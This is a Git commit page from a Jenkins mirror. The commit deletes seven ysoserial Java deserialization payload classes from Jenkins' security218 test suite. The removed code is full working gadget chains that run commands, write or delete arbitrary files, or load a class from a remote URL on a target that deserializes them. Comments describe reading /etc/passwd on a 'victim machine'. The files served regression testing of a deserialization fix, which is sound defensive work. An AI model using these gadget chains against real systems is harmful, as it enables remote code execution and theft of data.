Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
FIY695
jenkins
提交
4fc68251
J
jenkins
项目概览
FIY695
/
jenkins
与 Fork 源项目一致
从无法访问的项目Fork
通知
1
Star
0
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
J
jenkins
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
提交
Issue看板
体验新版 GitCode,发现更多精彩内容 >>
提交
4fc68251
编写于
11月 11, 2016
作者:
S
Sam Van Oort
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
Compileable ysoserial classes
上级
8395b78c
变更
7
隐藏空白更改
内联
并排
Showing
7 changed file
with
0 addition
and
569 deletion
+0
-569
test/src/test/java/jenkins/security/security218/ysoserial/payloads/BeanShell1.java
...s/security/security218/ysoserial/payloads/BeanShell1.java
+0
-51
test/src/test/java/jenkins/security/security218/ysoserial/payloads/JavassistWeld1.java
...curity/security218/ysoserial/payloads/JavassistWeld1.java
+0
-79
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Jython1.java
...kins/security/security218/ysoserial/payloads/Jython1.java
+0
-106
test/src/test/java/jenkins/security/security218/ysoserial/payloads/MozillaRhino1.java
...ecurity/security218/ysoserial/payloads/MozillaRhino1.java
+0
-66
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Myfaces1.java
...ins/security/security218/ysoserial/payloads/Myfaces1.java
+0
-92
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Myfaces2.java
...ins/security/security218/ysoserial/payloads/Myfaces2.java
+0
-64
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Wicket1.java
...kins/security/security218/ysoserial/payloads/Wicket1.java
+0
-111
未找到文件。
test/src/test/java/jenkins/security/security218/ysoserial/payloads/BeanShell1.java
已删除
100644 → 0
浏览文件 @
8395b78c
package
jenkins.security.security218.ysoserial.payloads
;
import
bsh.Interpreter
;
import
bsh.XThis
;
import
java.lang.reflect.InvocationHandler
;
import
java.lang.reflect.Proxy
;
import
java.util.Comparator
;
import
java.util.PriorityQueue
;
import
jenkins.security.security218.ysoserial.payloads.util.Reflections
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
/**
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
*/
@SuppressWarnings
({
"rawtypes"
,
"unchecked"
})
@Dependencies
({
"org.beanshell:bsh:2.0b5"
})
public
class
BeanShell1
extends
PayloadRunner
implements
ObjectPayload
<
PriorityQueue
>
{
public
PriorityQueue
getObject
(
String
command
)
throws
Exception
{
// BeanShell payload
String
payload
=
"compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{\""
+
command
+
"\"}).start();return new Integer(1);}"
;
// Create Interpreter
Interpreter
i
=
new
Interpreter
();
// Evaluate payload
i
.
eval
(
payload
);
// Create InvocationHandler
XThis
xt
=
new
XThis
(
i
.
getNameSpace
(),
i
);
InvocationHandler
handler
=
(
InvocationHandler
)
Reflections
.
getField
(
xt
.
getClass
(),
"invocationHandler"
).
get
(
xt
);
// Create Comparator Proxy
Comparator
comparator
=
(
Comparator
)
Proxy
.
newProxyInstance
(
Comparator
.
class
.
getClassLoader
(),
new
Class
<?>[]{
Comparator
.
class
},
handler
);
// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
final
PriorityQueue
<
Object
>
priorityQueue
=
new
PriorityQueue
<
Object
>(
2
,
comparator
);
Object
[]
queue
=
new
Object
[]
{
1
,
1
};
Reflections
.
setFieldValue
(
priorityQueue
,
"queue"
,
queue
);
Reflections
.
setFieldValue
(
priorityQueue
,
"size"
,
2
);
return
priorityQueue
;
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
BeanShell1
.
class
,
args
);
}
}
test/src/test/java/jenkins/security/security218/ysoserial/payloads/JavassistWeld1.java
已删除
100644 → 0
浏览文件 @
8395b78c
package
jenkins.security.security218.ysoserial.payloads
;
import
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
;
import
org.jboss.weld.interceptor.builder.InterceptionModelBuilder
;
import
org.jboss.weld.interceptor.builder.MethodReference
;
import
org.jboss.weld.interceptor.proxy.DefaultInvocationContextFactory
;
import
org.jboss.weld.interceptor.proxy.InterceptorMethodHandler
;
import
org.jboss.weld.interceptor.reader.ClassMetadataInterceptorReference
;
import
org.jboss.weld.interceptor.reader.DefaultMethodMetadata
;
import
org.jboss.weld.interceptor.reader.ReflectiveClassMetadata
;
import
org.jboss.weld.interceptor.reader.SimpleInterceptorMetadata
;
import
org.jboss.weld.interceptor.spi.instance.InterceptorInstantiator
;
import
org.jboss.weld.interceptor.spi.metadata.InterceptorReference
;
import
org.jboss.weld.interceptor.spi.metadata.MethodMetadata
;
import
org.jboss.weld.interceptor.spi.model.InterceptionModel
;
import
org.jboss.weld.interceptor.spi.model.InterceptionType
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.util.Gadgets
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
import
java.lang.reflect.Constructor
;
import
java.util.*
;
/*
by @matthias_kaiser
*/
@SuppressWarnings
({
"rawtypes"
,
"unchecked"
})
@Dependencies
({
"javassist:javassist:3.12.1.GA"
,
"org.jboss.weld:weld-core:1.1.33.Final"
,
"javax.enterprise:cdi-api:1.0-SP1"
,
"javax.interceptor:javax.interceptor-api:3.1"
,
"org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final"
,
"org.slf4j:slf4j-api:1.7.21"
})
public
class
JavassistWeld1
implements
ObjectPayload
<
Object
>
{
public
Object
getObject
(
final
String
command
)
throws
Exception
{
final
Object
gadget
=
Gadgets
.
createTemplatesImpl
(
command
);
InterceptionModelBuilder
builder
=
InterceptionModelBuilder
.
newBuilderFor
(
HashMap
.
class
);
ReflectiveClassMetadata
metadata
=
(
ReflectiveClassMetadata
)
ReflectiveClassMetadata
.
of
(
HashMap
.
class
);
InterceptorReference
interceptorReference
=
ClassMetadataInterceptorReference
.
of
(
metadata
);
Set
<
InterceptionType
>
s
=
new
HashSet
<
InterceptionType
>();
s
.
add
(
org
.
jboss
.
weld
.
interceptor
.
spi
.
model
.
InterceptionType
.
POST_ACTIVATE
);
Constructor
defaultMethodMetadataConstructor
=
DefaultMethodMetadata
.
class
.
getDeclaredConstructor
(
Set
.
class
,
MethodReference
.
class
);
defaultMethodMetadataConstructor
.
setAccessible
(
true
);
MethodMetadata
methodMetadata
=
(
MethodMetadata
)
defaultMethodMetadataConstructor
.
newInstance
(
s
,
MethodReference
.
of
(
TemplatesImpl
.
class
.
getMethod
(
"newTransformer"
),
true
));
List
list
=
new
ArrayList
();
list
.
add
(
methodMetadata
);
Map
<
org
.
jboss
.
weld
.
interceptor
.
spi
.
model
.
InterceptionType
,
List
<
MethodMetadata
>>
hashMap
=
new
HashMap
<
org
.
jboss
.
weld
.
interceptor
.
spi
.
model
.
InterceptionType
,
List
<
MethodMetadata
>>();
hashMap
.
put
(
org
.
jboss
.
weld
.
interceptor
.
spi
.
model
.
InterceptionType
.
POST_ACTIVATE
,
list
);
SimpleInterceptorMetadata
simpleInterceptorMetadata
=
new
SimpleInterceptorMetadata
(
interceptorReference
,
true
,
hashMap
);
builder
.
interceptAll
().
with
(
simpleInterceptorMetadata
);
InterceptionModel
model
=
builder
.
build
();
HashMap
map
=
new
HashMap
();
map
.
put
(
"ysoserial"
,
"ysoserial"
);
DefaultInvocationContextFactory
factory
=
new
DefaultInvocationContextFactory
();
InterceptorInstantiator
interceptorInstantiator
=
new
InterceptorInstantiator
()
{
public
Object
createFor
(
InterceptorReference
paramInterceptorReference
)
{
return
gadget
;
}
};
return
new
InterceptorMethodHandler
(
map
,
metadata
,
model
,
interceptorInstantiator
,
factory
);
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
JavassistWeld1
.
class
,
args
);
}
}
\ No newline at end of file
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Jython1.java
已删除
100644 → 0
浏览文件 @
8395b78c
package
jenkins.security.security218.ysoserial.payloads
;
import
org.apache.commons.io.FileUtils
;
import
org.python.core.*
;
import
java.math.BigInteger
;
import
java.io.File
;
import
java.lang.reflect.Proxy
;
import
java.util.Arrays
;
import
java.util.Comparator
;
import
java.util.PriorityQueue
;
import
jenkins.security.security218.ysoserial.payloads.util.Reflections
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.annotation.PayloadTest
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
/**
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
*
* This version of Jython1 writes a python script on the victim machine and
* executes it. The format of the parameters is:
*
* <local path>;<remote path>
*
* Where local path is the python script's location on the attack box and
* remote path is the location where the script will be written/executed from.
* For example:
*
* "/home/albino_lobster/read_etc_passwd.py;/tmp/jython1.py"
*
* In the above example, if "read_etc_passwd.py" simply contained the string:
*
* raise Exception(open('/etc/passwd', 'r').read())
*
* Then, when deserialized, the script will read in /etc/passwd and raise an
* exception with its contents (which could be useful if the target returns
* exception information).
*/
@PayloadTest
(
skip
=
"non RCE"
)
@SuppressWarnings
({
"rawtypes"
,
"unchecked"
,
"restriction"
})
@Dependencies
({
"org.python:jython-standalone:2.5.2"
})
public
class
Jython1
extends
PayloadRunner
implements
ObjectPayload
<
PriorityQueue
>
{
public
PriorityQueue
getObject
(
String
command
)
throws
Exception
{
String
[]
paths
=
command
.
split
(
";"
);
if
(
paths
.
length
!=
2
)
{
throw
new
IllegalArgumentException
(
"Unsupported command "
+
command
+
" "
+
Arrays
.
toString
(
paths
));
}
// Set payload parameters
String
python_code
=
FileUtils
.
readFileToString
(
new
File
(
paths
[
0
]),
"UTF-8"
);
// Python bytecode to write a file on disk and execute it
String
code
=
"740000"
+
//0 LOAD_GLOBAL 0 (open)
"640100"
+
//3 LOAD_CONST 1 (remote path)
"640200"
+
//6 LOAD_CONST 2 ('w+')
"830200"
+
//9 CALL_FUNCTION 2
"7D0000"
+
//12 STORE_FAST 0 (file)
"7C0000"
+
//15 LOAD_FAST 0 (file)
"690100"
+
//18 LOAD_ATTR 1 (write)
"640300"
+
//21 LOAD_CONST 3 (python code)
"830100"
+
//24 CALL_FUNCTION 1
"01"
+
//27 POP_TOP
"7C0000"
+
//28 LOAD_FAST 0 (file)
"690200"
+
//31 LOAD_ATTR 2 (close)
"830000"
+
//34 CALL_FUNCTION 0
"01"
+
//37 POP_TOP
"740300"
+
//38 LOAD_GLOBAL 3 (execfile)
"640100"
+
//41 LOAD_CONST 1 (remote path)
"830100"
+
//44 CALL_FUNCTION 1
"01"
+
//47 POP_TOP
"640000"
+
//48 LOAD_CONST 0 (None)
"53"
;
//51 RETURN_VALUE
// Helping consts and names
PyObject
[]
consts
=
new
PyObject
[]{
new
PyString
(
""
),
new
PyString
(
paths
[
1
]),
new
PyString
(
"w+"
),
new
PyString
(
python_code
)};
String
[]
names
=
new
String
[]{
"open"
,
"write"
,
"close"
,
"execfile"
};
// Generating PyBytecode wrapper for our python bytecode
PyBytecode
codeobj
=
new
PyBytecode
(
2
,
2
,
10
,
64
,
""
,
consts
,
names
,
new
String
[]{
""
,
""
},
"noname"
,
"<module>"
,
0
,
""
);
Reflections
.
setFieldValue
(
codeobj
,
"co_code"
,
new
BigInteger
(
code
,
16
).
toByteArray
());
// Create a PyFunction Invocation handler that will call our python bytecode when intercepting any method
PyFunction
handler
=
new
PyFunction
(
new
PyStringMap
(),
null
,
codeobj
);
// Prepare Trigger Gadget
Comparator
comparator
=
(
Comparator
)
Proxy
.
newProxyInstance
(
Comparator
.
class
.
getClassLoader
(),
new
Class
<?>[]{
Comparator
.
class
},
handler
);
PriorityQueue
<
Object
>
priorityQueue
=
new
PriorityQueue
<
Object
>(
2
,
comparator
);
Object
[]
queue
=
new
Object
[]
{
1
,
1
};
Reflections
.
setFieldValue
(
priorityQueue
,
"queue"
,
queue
);
Reflections
.
setFieldValue
(
priorityQueue
,
"size"
,
2
);
return
priorityQueue
;
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
Jython1
.
class
,
args
);
}
}
test/src/test/java/jenkins/security/security218/ysoserial/payloads/MozillaRhino1.java
已删除
100644 → 0
浏览文件 @
8395b78c
package
jenkins.security.security218.ysoserial.payloads
;
import
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
;
import
org.mozilla.javascript.*
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.util.Gadgets
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
import
javax.management.BadAttributeValueExpException
;
import
java.lang.reflect.Constructor
;
import
java.lang.reflect.Field
;
import
java.lang.reflect.Method
;
/*
by @matthias_kaiser
*/
@SuppressWarnings
({
"rawtypes"
,
"unchecked"
})
@Dependencies
({
"rhino:js:1.7R2"
})
public
class
MozillaRhino1
implements
ObjectPayload
<
Object
>
{
public
Object
getObject
(
final
String
command
)
throws
Exception
{
Class
nativeErrorClass
=
Class
.
forName
(
"org.mozilla.javascript.NativeError"
);
Constructor
nativeErrorConstructor
=
nativeErrorClass
.
getDeclaredConstructor
();
nativeErrorConstructor
.
setAccessible
(
true
);
IdScriptableObject
idScriptableObject
=
(
IdScriptableObject
)
nativeErrorConstructor
.
newInstance
();
Context
context
=
Context
.
enter
();
NativeObject
scriptableObject
=
(
NativeObject
)
context
.
initStandardObjects
();
Method
enterMethod
=
Context
.
class
.
getDeclaredMethod
(
"enter"
);
NativeJavaMethod
method
=
new
NativeJavaMethod
(
enterMethod
,
"name"
);
idScriptableObject
.
setGetterOrSetter
(
"name"
,
0
,
method
,
false
);
Method
newTransformer
=
TemplatesImpl
.
class
.
getDeclaredMethod
(
"newTransformer"
);
NativeJavaMethod
nativeJavaMethod
=
new
NativeJavaMethod
(
newTransformer
,
"message"
);
idScriptableObject
.
setGetterOrSetter
(
"message"
,
0
,
nativeJavaMethod
,
false
);
Method
getSlot
=
ScriptableObject
.
class
.
getDeclaredMethod
(
"getSlot"
,
String
.
class
,
int
.
class
,
int
.
class
);
getSlot
.
setAccessible
(
true
);
Object
slot
=
getSlot
.
invoke
(
idScriptableObject
,
"name"
,
0
,
1
);
Field
getter
=
slot
.
getClass
().
getDeclaredField
(
"getter"
);
getter
.
setAccessible
(
true
);
Class
memberboxClass
=
Class
.
forName
(
"org.mozilla.javascript.MemberBox"
);
Constructor
memberboxClassConstructor
=
memberboxClass
.
getDeclaredConstructor
(
Method
.
class
);
memberboxClassConstructor
.
setAccessible
(
true
);
Object
memberboxes
=
memberboxClassConstructor
.
newInstance
(
enterMethod
);
getter
.
set
(
slot
,
memberboxes
);
NativeJavaObject
nativeObject
=
new
NativeJavaObject
(
scriptableObject
,
Gadgets
.
createTemplatesImpl
(
command
),
TemplatesImpl
.
class
);
idScriptableObject
.
setPrototype
(
nativeObject
);
BadAttributeValueExpException
badAttributeValueExpException
=
new
BadAttributeValueExpException
(
null
);
Field
valField
=
badAttributeValueExpException
.
getClass
().
getDeclaredField
(
"val"
);
valField
.
setAccessible
(
true
);
valField
.
set
(
badAttributeValueExpException
,
idScriptableObject
);
return
badAttributeValueExpException
;
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
MozillaRhino1
.
class
,
args
);
}
}
\ No newline at end of file
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Myfaces1.java
已删除
100644 → 0
浏览文件 @
8395b78c
package
jenkins.security.security218.ysoserial.payloads
;
import
javax.el.ELContext
;
import
javax.el.ExpressionFactory
;
import
javax.el.ValueExpression
;
import
javax.servlet.ServletContext
;
import
javax.servlet.ServletRequest
;
import
javax.servlet.ServletResponse
;
import
org.apache.myfaces.context.servlet.FacesContextImpl
;
import
org.apache.myfaces.context.servlet.FacesContextImplBase
;
import
org.apache.myfaces.el.CompositeELResolver
;
import
org.apache.myfaces.el.unified.FacesELContext
;
import
org.apache.myfaces.view.facelets.el.ValueExpressionMethodExpression
;
import
jenkins.security.security218.ysoserial.payloads.annotation.PayloadTest
;
import
jenkins.security.security218.ysoserial.payloads.util.Gadgets
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
import
jenkins.security.security218.ysoserial.payloads.util.Reflections
;
/**
*
* ValueExpressionImpl.getValue(ELContext)
* ValueExpressionMethodExpression.getMethodExpression(ELContext)
* ValueExpressionMethodExpression.getMethodExpression()
* ValueExpressionMethodExpression.hashCode()
* HashMap<K,V>.hash(Object)
* HashMap<K,V>.readObject(ObjectInputStream)
*
* Arguments:
* - an EL expression to execute
*
* Requires:
* - MyFaces
* - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized)
*
* @author mbechler
*/
@PayloadTest
(
skip
=
"Requires running MyFaces, no direct execution"
)
public
class
Myfaces1
implements
ObjectPayload
<
Object
>,
DynamicDependencies
{
public
Object
getObject
(
String
command
)
throws
Exception
{
return
makeExpressionPayload
(
command
);
}
public
static
String
[]
getDependencies
()
{
if
(
System
.
getProperty
(
"el"
)
==
null
||
"apache"
.
equals
(
System
.
getProperty
(
"el"
))
)
{
return
new
String
[]
{
"org.apache.myfaces.core:myfaces-impl:2.2.9"
,
"org.apache.myfaces.core:myfaces-api:2.2.9"
,
"org.mortbay.jasper:apache-el:8.0.27"
,
"javax.servlet:javax.servlet-api:3.1.0"
,
// deps for mocking the FacesContext
"org.mockito:mockito-core:1.10.19"
,
"org.hamcrest:hamcrest-core:1.1"
,
"org.objenesis:objenesis:2.1"
};
}
else
if
(
"juel"
.
equals
(
System
.
getProperty
(
"el"
))
)
{
return
new
String
[]
{
"org.apache.myfaces.core:myfaces-impl:2.2.9"
,
"org.apache.myfaces.core:myfaces-api:2.2.9"
,
"de.odysseus.juel:juel-impl:2.2.7"
,
"de.odysseus.juel:juel-api:2.2.7"
,
"javax.servlet:javax.servlet-api:3.1.0"
,
// deps for mocking the FacesContext
"org.mockito:mockito-core:1.10.19"
,
"org.hamcrest:hamcrest-core:1.1"
,
"org.objenesis:objenesis:2.1"
};
}
throw
new
IllegalArgumentException
(
"Invalid el type "
+
System
.
getProperty
(
"el"
));
}
public
static
Object
makeExpressionPayload
(
String
expr
)
throws
IllegalArgumentException
,
IllegalAccessException
,
Exception
{
FacesContextImpl
fc
=
new
FacesContextImpl
((
ServletContext
)
null
,
(
ServletRequest
)
null
,
(
ServletResponse
)
null
);
ELContext
elContext
=
new
FacesELContext
(
new
CompositeELResolver
(),
fc
);
Reflections
.
getField
(
FacesContextImplBase
.
class
,
"_elContext"
).
set
(
fc
,
elContext
);
ExpressionFactory
expressionFactory
=
ExpressionFactory
.
newInstance
();
ValueExpression
ve1
=
expressionFactory
.
createValueExpression
(
elContext
,
expr
,
Object
.
class
);
ValueExpressionMethodExpression
e
=
new
ValueExpressionMethodExpression
(
ve1
);
ValueExpression
ve2
=
expressionFactory
.
createValueExpression
(
elContext
,
"${true}"
,
Object
.
class
);
ValueExpressionMethodExpression
e2
=
new
ValueExpressionMethodExpression
(
ve2
);
return
Gadgets
.
makeMap
(
e2
,
e
);
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
Myfaces1
.
class
,
args
);
}
}
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Myfaces2.java
已删除
100644 → 0
浏览文件 @
8395b78c
package
jenkins.security.security218.ysoserial.payloads
;
import
jenkins.security.security218.ysoserial.payloads.annotation.PayloadTest
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
/**
*
* ValueExpressionImpl.getValue(ELContext)
* ValueExpressionMethodExpression.getMethodExpression(ELContext)
* ValueExpressionMethodExpression.getMethodExpression()
* ValueExpressionMethodExpression.hashCode()
* HashMap<K,V>.hash(Object)
* HashMap<K,V>.readObject(ObjectInputStream)
*
* Arguments:
* - base_url:classname
*
* Yields:
* - Instantiation of remotely loaded class
*
* Requires:
* - MyFaces
* - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized)
*
* @author mbechler
*/
@PayloadTest
(
harness
=
"ysoserial.payloads.MyfacesTest"
)
public
class
Myfaces2
implements
ObjectPayload
<
Object
>,
DynamicDependencies
{
public
static
String
[]
getDependencies
()
{
return
Myfaces1
.
getDependencies
();
}
public
Object
getObject
(
String
command
)
throws
Exception
{
int
sep
=
command
.
lastIndexOf
(
':'
);
if
(
sep
<
0
)
{
throw
new
IllegalArgumentException
(
"Command format is: <base_url>:<classname>"
);
}
String
url
=
command
.
substring
(
0
,
sep
);
String
className
=
command
.
substring
(
sep
+
1
);
// based on http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/
String
expr
=
"${request.setAttribute('arr',''.getClass().forName('java.util.ArrayList').newInstance())}"
;
// if we add fewer than the actual classloaders we end up with a null entry
for
(
int
i
=
0
;
i
<
100
;
i
++
)
{
expr
+=
"${request.getAttribute('arr').add(request.servletContext.getResource('/').toURI().create('"
+
url
+
"').toURL())}"
;
}
expr
+=
"${request.getClass().getClassLoader().newInstance(request.getAttribute('arr')"
+
".toArray(request.getClass().getClassLoader().getURLs())).loadClass('"
+
className
+
"').newInstance()}"
;
return
Myfaces1
.
makeExpressionPayload
(
expr
);
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
Myfaces2
.
class
,
args
);
}
}
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Wicket1.java
已删除
100644 → 0
浏览文件 @
8395b78c
package
jenkins.security.security218.ysoserial.payloads
;
import
java.io.File
;
import
java.io.IOException
;
import
java.io.OutputStream
;
import
java.util.Arrays
;
import
org.apache.commons.codec.binary.Base64
;
import
org.apache.wicket.util.upload.DiskFileItem
;
import
org.apache.wicket.util.io.DeferredFileOutputStream
;
import
org.apache.wicket.util.io.ThresholdingOutputStream
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
import
jenkins.security.security218.ysoserial.payloads.util.Reflections
;
/**
* This gadget is almost identical to FileUpload1 since it appears
* that Apache Wicket copied a version of Apache Commons DiskFileItem
* prior to Pierre Ernst reporting CVE-2013-2186 (NULL byte attack). That
* means that if the target is running less than Oracle Java 7 update 40
* then the NULL byte attack is viable. Otherwise, copy and move attacks
* always work.
*
* This attack is valid for the 1.x and 6.x lines of Apache Wicket but
* was fixed in 1.5.16 and 6.24.0 (released July 2016).
*
*
* Arguments:
* - copyAndDelete;sourceFile;destDir
* - write;destDir;ascii-data
* - writeB64;destDir;base64-data
* - writeOld;destFile;ascii-data
* - writeOldB64;destFile;base64-data
*
* Example:
* Wicket1 "write;/tmp;blue lobster"
*
* Result:
* $ ls -l /tmp/
* -rw-rw-r-- 1 albino_lobster albino_lobster 12 Jul 25 14:10 upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp
* $ cat /tmp/upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp
* blue lobster
*/
@Dependencies
({
"wicket-util:wicket-util:6.23"
})
public
class
Wicket1
implements
ReleaseableObjectPayload
<
DiskFileItem
>
{
public
DiskFileItem
getObject
(
String
command
)
throws
Exception
{
String
[]
parts
=
command
.
split
(
";"
);
if
(
parts
.
length
!=
3
)
{
throw
new
IllegalArgumentException
(
"Bad command format."
);
}
if
(
"copyAndDelete"
.
equals
(
parts
[
0
]))
{
return
copyAndDelete
(
parts
[
1
],
parts
[
2
]);
}
else
if
(
"write"
.
equals
(
parts
[
0
]))
{
return
write
(
parts
[
1
],
parts
[
2
].
getBytes
(
"US-ASCII"
));
}
else
if
(
"writeB64"
.
equals
(
parts
[
0
])
)
{
return
write
(
parts
[
1
],
Base64
.
decodeBase64
(
parts
[
2
]));
}
else
if
(
"writeOld"
.
equals
(
parts
[
0
])
)
{
return
writeOldJRE
(
parts
[
1
],
parts
[
2
].
getBytes
(
"US-ASCII"
));
}
else
if
(
"writeOldB64"
.
equals
(
parts
[
0
])
)
{
return
writeOldJRE
(
parts
[
1
],
Base64
.
decodeBase64
(
parts
[
2
]));
}
throw
new
IllegalArgumentException
(
"Unsupported command "
+
command
+
" "
+
Arrays
.
toString
(
parts
));
}
public
void
release
(
DiskFileItem
obj
)
throws
Exception
{
}
private
static
DiskFileItem
copyAndDelete
(
String
copyAndDelete
,
String
copyTo
)
throws
IOException
,
Exception
{
return
makePayload
(
0
,
copyTo
,
copyAndDelete
,
new
byte
[
1
]);
}
// writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp)
private
static
DiskFileItem
write
(
String
dir
,
byte
[]
data
)
throws
IOException
,
Exception
{
return
makePayload
(
data
.
length
+
1
,
dir
,
dir
+
"/whatever"
,
data
);
}
// writes data to an arbitrary file
private
static
DiskFileItem
writeOldJRE
(
String
file
,
byte
[]
data
)
throws
IOException
,
Exception
{
return
makePayload
(
data
.
length
+
1
,
file
+
"\0"
,
file
,
data
);
}
private
static
DiskFileItem
makePayload
(
int
thresh
,
String
repoPath
,
String
filePath
,
byte
[]
data
)
throws
IOException
,
Exception
{
// if thresh < written length, delete outputFile after copying to repository temp file
// otherwise write the contents to repository temp file
File
repository
=
new
File
(
repoPath
);
DiskFileItem
diskFileItem
=
new
DiskFileItem
(
"test"
,
"application/octet-stream"
,
false
,
"test"
,
100000
,
repository
,
null
);
File
outputFile
=
new
File
(
filePath
);
DeferredFileOutputStream
dfos
=
new
DeferredFileOutputStream
(
thresh
,
outputFile
);
OutputStream
os
=
(
OutputStream
)
Reflections
.
getFieldValue
(
dfos
,
"memoryOutputStream"
);
os
.
write
(
data
);
Reflections
.
getField
(
ThresholdingOutputStream
.
class
,
"written"
).
set
(
dfos
,
data
.
length
);
Reflections
.
setFieldValue
(
diskFileItem
,
"dfos"
,
dfos
);
Reflections
.
setFieldValue
(
diskFileItem
,
"sizeThreshold"
,
0
);
return
diskFileItem
;
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
FileUpload1
.
class
,
args
);
}
}
\ No newline at end of file
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录